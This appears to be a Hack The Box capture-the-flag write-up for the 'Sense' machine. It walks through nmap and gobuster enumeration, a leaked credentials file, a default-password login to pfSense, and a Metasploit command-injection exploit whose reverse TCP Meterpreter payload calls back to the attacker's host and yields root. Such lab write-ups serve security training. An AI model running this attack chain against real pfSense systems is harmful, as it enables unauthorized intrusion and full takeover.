10/07/2024

HTB: Sense

 ___  ___  _________  ________                         
|\  \|\  \|\___   ___\\   __  \  ___                   
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\                  
 \ \   __  \   \ \  \ \ \   __  \|__|                  
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___                
   \ \__\ \__\   \ \__\ \ \_______\|\__\               
    \|__|\|__|    \|__|  \|_______|\|__|               
 ________  _______   ________   ________  _______      
|\   ____\|\  ___ \ |\   ___  \|\   ____\|\  ___ \     
\ \  \___|\ \   __/|\ \  \\ \  \ \  \___|\ \   __/|    
 \ \_____  \ \  \_|/_\ \  \\ \  \ \_____  \ \  \_|/__  
  \|____|\  \ \  \_|\ \ \  \\ \  \|____|\  \ \  \_|\ \ 
    ____\_\  \ \_______\ \__\\ \__\____\_\  \ \_______\
   |\_________\|_______|\|__| \|__|\_________\|_______|
   \|_________|                   \|_________|         
                                                            

Hack The Box's Sense is an Easy OpenBSD machine that features pfSense, an open-source firewall software. This machine uses basic directory brute-forcing using Gobuster to search for a user credential text file to gain access to the firewall, followed by an injection attack to gain root access to the machine.

Once starting the machine on HTB and connecting to your HTB VPN, we will start by opening our terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.

ping 10.10.10.60

You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. Once confirming the network is up and running, it's time to move to enumeration using Nmap.

Start by doing a quick service scan using Nmap. We will use the -sV switch to enable version detection. You can learn more about Nmap here.

nmap -sV 10.10.10.60
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-02 11:17 CDT
Nmap scan report for 10.10.10.60
Host is up (0.0091s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
443/tcp open  ssl/https?

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.98 seconds

We can see a web server running. Let's navigate to the site by entering the target's ip address in our web browser. Upon inspection we can see a login page for pfSense, an open-source firewall software based in FreeBSD. We can complete a quick Google search for the default credentials for pfSense and find the default username is "admin" and the password is "pfsense". When trying these default credentials, we are notified they are not correct. Let's move on to using Gobuster to brute-force directories on the server. We'll search for .php and .txt files using the directory-list-2.3-medium.txt wordlist.

gobuster dir -u https://10.10.10.60/ -t 50 -x php,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.60/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 6690]
/help.php             (Status: 200) [Size: 6689]
/themes               (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/]
/stats.php            (Status: 200) [Size: 6690]
/css                  (Status: 301) [Size: 0] [--> https://10.10.10.60/css/]
/edit.php             (Status: 200) [Size: 6689]
/includes             (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]
/license.php          (Status: 200) [Size: 6692]
/system.php           (Status: 200) [Size: 6691]
/status.php           (Status: 200) [Size: 6691]
/javascript           (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]
/changelog.txt        (Status: 200) [Size: 271]
/classes              (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]
/exec.php             (Status: 200) [Size: 6689]
/widgets              (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/]
/graph.php            (Status: 200) [Size: 6690]
/tree                 (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/]
/wizard.php           (Status: 200) [Size: 6691]
/shortcuts            (Status: 301) [Size: 0] [--> https://10.10.10.60/shortcuts/]
/pkg.php              (Status: 200) [Size: 6688]
/installer            (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/]
/wizards              (Status: 301) [Size: 0] [--> https://10.10.10.60/wizards/]
/xmlrpc.php           (Status: 200) [Size: 384]
/reboot.php           (Status: 200) [Size: 6691]
/interfaces.php       (Status: 200) [Size: 6695]
/csrf                 (Status: 301) [Size: 0] [--> https://10.10.10.60/csrf/]
/system-users.txt     (Status: 200) [Size: 106]
/filebrowser          (Status: 301) [Size: 0] [--> https://10.10.10.60/filebrowser/]

After some time, we will notice a /systems-users.txt, highlighted above in orange. This file is interesting because there could be user login information within the text file. We can view this file by navigating to the path on the web server by using our web browser. On my spawned HTB machine it would be https://10.10.10.60/system-users.txt. We get the following page with a support ticket containing credentials:

####Support ticket###

Please create the following user


username: Rohit
password: company defaults

We see the username listed as "Rohit" and the password as "company defaults". After testing these credentials on the pfSense login page, we see we are not granted access. But let's try the default pfSense password, "pfsense". Upon using these credentials we see we are granted access!

Let's fire-up Metasploit and search for potential exploits for pfSense:

msfconsole
Metasploit tip: To save all commands executed since start up to a file, use the 
makerc command
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v6.3.44-dev                          ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >> search pfsense

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/unix/http/pfsense_clickjacking          2017-11-21       normal     No     Clickjacking Vulnerability In CSRF Error Page pfSense
   1  exploit/unix/http/pfsense_diag_routes_webshell  2022-02-23       excellent  Yes    pfSense Diag Routes Web Shell Upload
   2  exploit/unix/http/pfsense_config_data_exec      2023-03-18       excellent  Yes    pfSense Restore RRD Data Command Injection
   3  exploit/unix/http/pfsense_graph_injection_exec  2016-04-18       excellent  No     pfSense authenticated graph status RCE
   4  exploit/unix/http/pfsense_group_member_exec     2017-11-06       excellent  Yes    pfSense authenticated group member RCE
   5  exploit/unix/http/pfsense_pfblockerng_webshell  2022-09-05       great      Yes    pfSense plugin pfBlockerNG unauthenticated RCE as root


Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/http/pfsense_pfblockerng_webshell

[msf](Jobs:0 Agents:0) >> 

We see option #3 shows a module for an injection attack granting authentication. You can read more about this specific exploit on Rapid7's website here. Let's select this attack and fill out the required exploit options:

use 3
[*] Using configured payload php/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> options

Module options (exploit/unix/http/pfsense_graph_injection_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  pfsense          yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit
                                        /basics/using-metasploit.html
   RPORT     443              yes       The target port (TCP)
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set RHOSTS 10.10.10.60
RHOSTS => 10.10.10.60
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set USERNAME rohit
USERNAME => rohit
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set LHOST tun0
LHOST => 10.10.14.6
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> 

We set the RHOSTS to the target ip address, the USERNAME to "rohit", and the LHOST to our desired listening ip address for the reverse TCP connection. We can now run this exploit using "exploit":

exploit

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (39927 bytes) to 10.10.10.60
[+] Deleted uz
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.60:53021) at 2024-10-02 12:06:53 -0500

(Meterpreter 1)(/var/db/rrd) > getuid
Server username: root
(Meterpreter 1)(/var/db/rrd) > 

Once the reverse TCP connection is successful, we can use the "getuid" command to see we now have root access to the machine! You can now navigate through the target system to obtain the root and user .txt flags.